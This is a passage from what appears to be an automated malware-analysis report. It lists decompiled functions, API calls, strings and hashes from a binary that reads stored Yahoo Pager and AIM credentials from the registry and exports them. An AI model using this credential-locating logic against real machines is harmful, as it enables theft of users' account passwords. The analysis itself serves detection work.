						SetWindowTextA(_a4,  &_v4104);
					}
					return EnumChildWindows(_a4, E00408B1D, 0);
				}
				return 0x1004;
			}





                                          0x00408b82
                                          0x00408b8e
                                          0x00408b9e
                                          0x00408ba5
                                          0x00408baa
                                          0x00408bba
                                          0x00408bd5
                                          0x00408be1
                                          0x00408be1
                                          0x00000000
                                          0x00408bf1
                                          0x00408bf8

                                          APIs
                                          • memset.MSVCRT ref: 00408BA5
                                          • sprintf.MSVCRT ref: 00408BBA
                                            • Part of subcall function 00408C31: memset.MSVCRT ref: 00408C55
                                            • Part of subcall function 00408C31: GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
                                            • Part of subcall function 00408C31: _mbscpy.MSVCRT ref: 00408C91
                                          • SetWindowTextA.USER32(?,?), ref: 00408BE1
                                          • EnumChildWindows.USER32(?,Function_00008B1D,00000000), ref: 00408BF1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                          • String ID: caption$dialog_%d
                                          • API String ID: 2923679083-4161923789
                                          • Opcode ID: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
                                          • Instruction ID: de831da21bc0203e5008b33b3115c9aeec9d60fef0dfeaee9ccd5ecb51ae2e74
                                          • Opcode Fuzzy Hash: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
                                          • Instruction Fuzzy Hash: EEF0C27054034CBAEB129751DC06FD93A686B08B05F0440AABB84B11D1DEB896C08B1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00411356, Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004107B0,00000000,?), ref: 0041138D
                                          • memset.MSVCRT ref: 004113EA
                                          • memset.MSVCRT ref: 004113FC
                                            • Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198
                                          • memset.MSVCRT ref: 004114E3
                                          • _mbscpy.MSVCRT ref: 00411508
                                          • CloseHandle.KERNEL32(?,004107B0,?), ref: 00411552
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                          • String ID:
                                          • API String ID: 3974772901-0
                                          • Opcode ID: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
                                          • Instruction ID: 2b4e81a65471dd6bda77e3e7a539d18b8ecf8660f8cea3ab0205070076e1852f
                                          • Opcode Fuzzy Hash: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
                                          • Instruction Fuzzy Hash: 5F511FB1D00218ABDF10DF95DC85ADEBBB9EF48704F0040A6E609A6251D7759FC0CF69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040807D, Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E0040807D(char* __ebx, void* __eflags, void _a4, void _a8, intOrPtr _a12, short _a16) {
				void _v8;
				void _v12;
				char _v28;
				char _v116;
				char _v244;
				char _v248;
				char _v372;
				void _v627;
				char _v628;
				void* __edi;
				void* __esi;
				void* _t44;
				intOrPtr* _t50;
				int _t57;
				char* _t66;
				signed int _t69;
				intOrPtr _t75;
				int _t76;
				void* _t82;
				void* _t83;

				_t66 = __ebx;
				_t76 = 0;
				memcpy( &_v12,  &_a8, 4);
				memcpy( &_v8,  &_a4, 4);
				E0040C905( &_v116);
				_push( &_v12);
				_t44 = 8;
				E0040C929(_t44,  &_v116);
				E0040C9C7(0,  &_v116,  &_v28);
				E00405235( &_v372);
				_t69 = 0;
				_t50 =  &_v248;
				do {
					 *((intOrPtr*)(_t83 + _t69 * 4 - 0xf0)) =  *((intOrPtr*)(_t50 - 4));
					_t75 =  *_t50;
					 *((intOrPtr*)(_t83 + _t69 * 4 - 0xec)) = _t75;
					_t69 = _t69 + 2;
					_t50 = _t50 - 8;
				} while (_t69 < 0x20);
				if(_a16 >= 8) {
					_v628 = 0;
					memset( &_v627, 0, 0xfe);
					_t81 = _a12;
					E00405641(_a12, _t69, __ebx,  &_v244);
					if(_a16 < 0x10) {
						__ebx[8] = 0;
					} else {
						E00405641(_t81 + 8,  &_v244,  &(__ebx[8]),  &_v244);
						__ebx[0x10] = 0;
					}
					_t57 = strlen(_t66);
					if(_t57 > 2) {
						asm("cdq");
						_t82 = (_t57 - _t75 >> 1) - 1 + _t66;
						0x413d0c( &_v628, _t82 + 2);
						0x413d0c(_t82,  &_v628);
					}
					_t76 = 1;
				}
				return _t76;
			}























                                          0x0040807d
                                          0x00408092
                                          0x00408094
                                          0x004080a3
                                          0x004080ab
                                          0x004080b3
                                          0x004080b6
                                          0x004080ba
                                          0x004080c6
                                          0x004080d7
                                          0x004080dc
                                          0x004080de
                                          0x004080e4
                                          0x004080e7
                                          0x004080ee
                                          0x004080f0
                                          0x004080f8
                                          0x004080f9
                                          0x004080fc
                                          0x00408106
                                          0x00408119
                                          0x00408120
                                          0x00408125
                                          0x00408133
                                          0x00408140
                                          0x0040815b
                                          0x00408142
                                          0x0040814f
                                          0x00408155
                                          0x00408155
                                          0x00408160
                                          0x00408169
                                          0x0040816b
                                          0x00408171
                                          0x0040817f
                                          0x0040818c
                                          0x00408191
                                          0x00408196
                                          0x00408196
                                          0x0040819c

                                          APIs
                                          • memcpy.MSVCRT ref: 00408094
                                          • memcpy.MSVCRT ref: 004080A3
                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                            • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                          • memset.MSVCRT ref: 00408120
                                          • strlen.MSVCRT ref: 00408160
                                          • _mbscpy.MSVCRT ref: 0040817F
                                          • _mbscpy.MSVCRT ref: 0040818C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpymemset$_mbscpy$strlen
                                          • String ID:
                                          • API String ID: 2712745786-0
                                          • Opcode ID: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                          • Instruction ID: bdbe0c05a74f47d21f032104af17620136749afb05b7a30319e2a8bb584ff9b0
                                          • Opcode Fuzzy Hash: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                          • Instruction Fuzzy Hash: AC3194728001099ACF14EF65DC85BDE77BCAF44304F00446FE549E7181EB74A68A8BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B8FA, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 70COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040B8FA(void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void _v1095;
				char _v1096;
				void* __ebx;
				void* _t39;
				signed short _t52;

				_v1096 = 0;
				memset( &_v1095, 0, 0x3ff);
				_v8 = 0x747874;
				_v72 = E0040876F(0x1f5);
				_v68 = 0x418600;
				_v64 = E0040876F(0x1f6);
				_v60 = 0x418600;
				_v56 = E0040876F(0x1f7);
				_v52 = 0x418600;
				_v48 = E0040876F(0x1f8);
				_v44 = 0x418608;
				_v40 = E0040876F(0x1f9);
				_v36 = 0x418608;
				_v32 = E0040876F(0x1fa);
				_v28 = 0x418618;
				_v24 = E0040876F(0x1fb);
				_v20 = 0x418620;
				_v16 = E0040876F(0x1fc);
				_v12 = 0x418620;
				E00407034( &_v1096,  &_v72);
				_t52 = 7;
				_t39 = E0040876F(_t52);
				_t23 =  &_v8; // 0x747874
				return E00406E60(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
			}

























                                          0x0040b913
                                          0x0040b91a
                                          0x0040b927
                                          0x0040b939
                                          0x0040b93c
                                          0x0040b949
                                          0x0040b94c
                                          0x0040b955
                                          0x0040b958
                                          0x0040b96a
                                          0x0040b96d
                                          0x0040b976
                                          0x0040b979
                                          0x0040b986
                                          0x0040b989
                                          0x0040b99b
                                          0x0040b99e
                                          0x0040b9a6
                                          0x0040b9b3
                                          0x0040b9b6
                                          0x0040b9be
                                          0x0040b9bf
                                          0x0040b9c7
                                          0x0040b9e7

                                          APIs
                                          • memset.MSVCRT ref: 0040B91A
                                            • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                            • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                            • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                            • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                            • Part of subcall function 00407034: memset.MSVCRT ref: 00407055
                                            • Part of subcall function 00407034: sprintf.MSVCRT ref: 0040707E
                                            • Part of subcall function 00407034: strlen.MSVCRT ref: 0040708A
                                            • Part of subcall function 00407034: memcpy.MSVCRT ref: 0040709F
                                            • Part of subcall function 00407034: strlen.MSVCRT ref: 004070AD
                                            • Part of subcall function 00407034: memcpy.MSVCRT ref: 004070BD
                                            • Part of subcall function 00406E60: _mbscpy.MSVCRT ref: 00406EC6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                          • API String ID: 2726666094-3614832568
                                          • Opcode ID: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
                                          • Instruction ID: 663635aaa2767a47ae833ce325b1c2bbb94a135e02c7cec880bc1d98f4d47d81
                                          • Opcode Fuzzy Hash: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
                                          • Instruction Fuzzy Hash: 8E21EBB5C002189FCB01FFA5DA817DDBBB4AB08708F20417FE549B7286DF381A558B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406CAA, Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E00406CAA(void* __edx, struct HWND__* _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t17;
				void* _t36;
				struct HDC__* _t38;

				_t36 = __edx;
				_t38 = GetDC(0);
				_t17 = GetDeviceCaps(_t38, 8);
				_v8 = GetDeviceCaps(_t38, 0xa);
				ReleaseDC(0, _t38);
				GetWindowRect(_a4,  &_v24);
				asm("cdq");
				asm("cdq");
				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
			}








                                          0x00406caa
                                          0x00406cc1
                                          0x00406cc6
                                          0x00406cd2
                                          0x00406cd5
                                          0x00406ce2
                                          0x00406cfa
                                          0x00406d0e
                                          0x00406d2a

                                          APIs
                                          • GetDC.USER32(00000000), ref: 00406CB5
                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00406CC6
                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00406CCD
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00406CD5
                                          • GetWindowRect.USER32(?,?), ref: 00406CE2
                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,745D3BB0), ref: 00406D20
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CapsDeviceWindow$MoveRectRelease
                                          • String ID:
                                          • API String ID: 3197862061-0
                                          • Opcode ID: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
                                          • Instruction ID: 8a34af0b3d0659c25a6c3d8e0783375a2f2358695c0a050eea5ba45bf34a7176
                                          • Opcode Fuzzy Hash: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
                                          • Instruction Fuzzy Hash: 62118E32A00219EFDB009FB9CD4DEEF7FB8EB84750F054165F905A7250DA70AD01CAA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403D24, Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00403D24(void* _a4, char* _a8) {
				long _v8;
				void _v8199;
				char _v8200;
				void _v24582;
				short _v24584;

				0x414060();
				_v24584 = 0;
				memset( &_v24582, 0, 0x3ffe);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}








                                          0x00403d2c
                                          0x00403d42
                                          0x00403d49
                                          0x00403d5c
                                          0x00403d62
                                          0x00403d79
                                          0x00403d98
                                          0x00403dc4

                                          APIs
                                          • memset.MSVCRT ref: 00403D49
                                          • memset.MSVCRT ref: 00403D62
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403D79
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403D98
                                          • strlen.MSVCRT ref: 00403DAA
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403DBB
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWidememset$FileWritestrlen
                                          • String ID:
                                          • API String ID: 1786725549-0
                                          • Opcode ID: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
                                          • Instruction ID: 833f6c37e82b16f9b4c34b80bb2ce5ff812abd73926e68a98c8801a8732a43de
                                          • Opcode Fuzzy Hash: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
                                          • Instruction Fuzzy Hash: 2C111BB644122CFEEB119B94DC89EEB77ACEF08354F1041A6B715E2091E6349F448BB8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F37A, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                            • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                          • _strcmpi.MSVCRT ref: 0040F3D1
                                          • _strcmpi.MSVCRT ref: 0040F3F0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi$memcpystrlen
                                          • String ID: http://www.ebuddy.com$http://www.imvu.com$https://www.google.com
                                          • API String ID: 2025310588-2353251349
                                          • Opcode ID: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
                                          • Instruction ID: 147ef2bbec41d1b0b79b570ae49dc02a3b2ea9406cbc79ec07c01e0a249b4c29
                                          • Opcode Fuzzy Hash: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
                                          • Instruction Fuzzy Hash: 1B11C1B21083409AD330EF25D8457DB77E8EFA4305F10893FE998A2182EB785649875A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00412E4D, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
                                          • Instruction ID: 39cb4549293e6cd4e8f45f1fb6a35693fcb7bd1e2582dcc07fe9920ce8c868a3
                                          • Opcode Fuzzy Hash: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
                                          • Instruction Fuzzy Hash: 83014F32A0AA3527C6257E2675017CBA3646F05B29F15420FF808B73428B6C7DE046DE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413B1D, Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00413B3E
                                          • memset.MSVCRT ref: 00413B57
                                          • memset.MSVCRT ref: 00413B6B
                                            • Part of subcall function 00413646: strlen.MSVCRT ref: 00413653
                                          • strlen.MSVCRT ref: 00413B87
                                          • memcpy.MSVCRT ref: 00413BAC
                                          • memcpy.MSVCRT ref: 00413BC2
                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                            • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                          • memcpy.MSVCRT ref: 00413C02
                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpymemset$strlen
                                          • String ID:
                                          • API String ID: 2142929671-0
                                          • Opcode ID: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
                                          • Instruction ID: 3b0ef80f5f4f1d26b85f6ed19fc7f93af9089081b0544b1b4270697ce1475561
                                          • Opcode Fuzzy Hash: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
                                          • Instruction Fuzzy Hash: EB512CB290011DAFCB10EF55DC81AEEB7A9BF04309F5445BAE509E7141EB34AF898F94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402730, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                          • strtoul.MSVCRT ref: 00402782
                                          • _mbscpy.MSVCRT ref: 00402807
                                          • _mbscpy.MSVCRT ref: 00402817
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$QueryValuestrtoul
                                          • String ID: 3 d5JKNNC,MANSLDJQ32ELK1N4SAIp08$TRIPWD
                                          • API String ID: 4008679483-1446091703
                                          • Opcode ID: f6eeec1ff9ae7628eb1c59c3add0b7cd5bc7a45f9ca8feae453d05bdffcb2e4c
                                          • Instruction ID: 4ca16360b260b82c0f814568f8b1846068da3ba20428fc10580ffdfcf904f702
                                          • Opcode Fuzzy Hash: f6eeec1ff9ae7628eb1c59c3add0b7cd5bc7a45f9ca8feae453d05bdffcb2e4c
                                          • Instruction Fuzzy Hash: 2C31E83280424C6EDF01DBB8E941ADFBFB4AF19310F1444AAE944FB191D674AB49CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B2F5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0040B2F5(void* __eax) {
				void* __esi;
				_Unknown_base(*)()* _t30;
				void* _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr* _t41;
				char* _t51;
				int _t58;

				_t40 = __eax;
				memcpy( *((intOrPtr*)(__eax + 0x390)) + 0x1d4,  *(__eax + 0x38c), 0x1c8 << 2);
				asm("movsw");
				asm("movsb");
				_t44 =  *((intOrPtr*)(_t40 + 0x398));
				_t58 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x398)) + 0x30)) > 0) {
					do {
						_t35 = E0040779F(_t58, _t44);
						0x413d74("/sort", _t35);
						if(_t35 == 0) {
							_t7 = _t58 + 1; // 0x1
							_t51 = E0040779F(_t7,  *((intOrPtr*)(_t40 + 0x398)));
							_t66 =  *_t51 - 0x7e;
							_t38 =  *((intOrPtr*)(_t40 + 0x390));
							if( *_t51 != 0x7e) {
								_push(0);
							} else {
								_push(1);
								_t51 = _t51 + 1;
							}
							_push(_t51);
							E0040AE7D(_t38, _t66);
						}
						_t44 =  *((intOrPtr*)(_t40 + 0x398));
						_t58 = _t58 + 1;
					} while (_t58 <  *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x398)) + 0x30)));
				}
				E0040671B();
				 *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x390)) + 0x28)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x390)))) + 0x5c))();
				if(E004077AF( *((intOrPtr*)(_t40 + 0x398)), ?str?, 0xffffffff) == 0xffffffff) {
					_t41 =  *((intOrPtr*)(_t40 + 0x390));
					if( *0x41e394 == 0) {
						 *0x41e398 =  *((intOrPtr*)(_t41 + 0x1ac));
						 *0x41e394 = 1;
					}
					_t30 =  *((intOrPtr*)( *_t41 + 0x60))(E0040AE57);
					qsort( *((intOrPtr*)( *_t41 + 0x64))(), 0,  *(_t41 + 0x28), _t30);
				}
				return SetCursor( *0x41dbd8);
			}











                                          0x0040b2f8
                                          0x0040b311
                                          0x0040b313
                                          0x0040b315
                                          0x0040b316
                                          0x0040b31e
                                          0x0040b323
                                          0x0040b325
                                          0x0040b327
                                          0x0040b332
                                          0x0040b33b
                                          0x0040b343
                                          0x0040b34b
                                          0x0040b34d
                                          0x0040b350
                                          0x0040b356
                                          0x0040b35d
                                          0x0040b358
                                          0x0040b358
                                          0x0040b35a
                                          0x0040b35a
                                          0x0040b35e
                                          0x0040b35f
                                          0x0040b35f
                                          0x0040b364
                                          0x0040b36a
                                          0x0040b36b
                                          0x0040b325
                                          0x0040b370
                                          0x0040b37b
                                          0x0040b386
                                          0x0040b39e
                                          0x0040b3a6
                                          0x0040b3ac
                                          0x0040b3b4
                                          0x0040b3b9
                                          0x0040b3b9
                                          0x0040b3cf
                                          0x0040b3dd
                                          0x0040b3e2
                                          0x0040b3f4

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Cursor_mbsicmpqsort
                                          • String ID: /nosort$/sort
                                          • API String ID: 882979914-1578091866
                                          • Opcode ID: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
                                          • Instruction ID: c642ed81bba6fc27793a5d708b6807a860a9cb0bcd27181b40ce8d315371ea34
                                          • Opcode Fuzzy Hash: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
                                          • Instruction Fuzzy Hash: 3721A231600200DFDB05EF25C8C1E9577A9EF85728F2400BAFD19AF2D2CB79A841CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413735, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00413757
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                            • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                          • RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseOpenQueryValuememset
                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                          • API String ID: 1830152886-1703613266
                                          • Opcode ID: 97c6f1d67ff91e2b20a0c02c3cf9c7012dd61d188e09fd72fdd0fd453f24f1e9
                                          • Instruction ID: 02697a5e3e6c6c3f452774ad5988b122dd70f79e91add571e9a1c89a2d7602b2
                                          • Opcode Fuzzy Hash: 97c6f1d67ff91e2b20a0c02c3cf9c7012dd61d188e09fd72fdd0fd453f24f1e9
                                          • Instruction Fuzzy Hash: 9301F9B6B00104FFEF106A95AD42ADA7BACDF04315F10406BFE04F3251E675AF8586AC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00412396, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                          • SHGetMalloc.SHELL32(?), ref: 004123A6
                                          • SHBrowseForFolder.SHELL32(?), ref: 004123D8
                                          • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004123EC
                                          • _mbscpy.MSVCRT ref: 004123FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: BrowseFolderFromListMallocPath_mbscpy
                                          • String ID: [@
                                          • API String ID: 1479990042-3416412563
                                          • Opcode ID: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
                                          • Instruction ID: 5ef3e47e4b44953a2dad9ee1bf13406931f922e9c8d23326f6bb0268a582906b
                                          • Opcode Fuzzy Hash: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
                                          • Instruction Fuzzy Hash: 5F11FAB5900218EFCB00DFA9D984AEEBBF8EB49314B10406AE905E7200D779DE45CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408C31, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00408C31(CHAR* _a4, intOrPtr _a8) {
				void _v4103;
				char _v4104;

				0x414060();
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				GetPrivateProfileStringA(0x41e308, _a4, 0x417c88,  &_v4104, 0x1000, 0x41e200);
				if(_v4104 == 0) {
					return 0;
				} else {
					0x413d0c(_a8,  &_v4104);
					return 1;
				}
			}





                                          0x00408c39
                                          0x00408c4e
                                          0x00408c55
                                          0x00408c77
                                          0x00408c85
                                          0x00408ca0
                                          0x00408c87
                                          0x00408c91
                                          0x00408c9c
                                          0x00408c9c

                                          APIs
                                          • memset.MSVCRT ref: 00408C55
                                          • GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
                                          • _mbscpy.MSVCRT ref: 00408C91
                                          Strings
                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408C3E
                                          • ?@, xrefs: 00408C31
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileString_mbscpymemset
                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$?@
                                          • API String ID: 408644273-2377969721
                                          • Opcode ID: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
                                          • Instruction ID: 2fc49bb05c8bae64ff8dc8c223d61166255d3b04a08aec8dce2eb6f2e2500c43
                                          • Opcode Fuzzy Hash: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
                                          • Instruction Fuzzy Hash: BCF0E0725451587AEB139B54EC05FCA7BBC9B4C706F1040E6B749F6080D5F89AC087AC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406830, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E00406830(long __eax, struct HWND__* _a4) {
				char _v1028;
				char _v2052;
				void* __edi;
				long _t15;

				_t15 = __eax;
				if(__eax == 0) {
					_t15 = GetLastError();
				}
				E00406735(_t15,  &_v1028);
				_push( &_v1028);
				_push(_t15);
				sprintf( &_v2052, "Error %d: %s");
				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
			}







                                          0x0040683a
                                          0x0040683e
                                          0x00406846
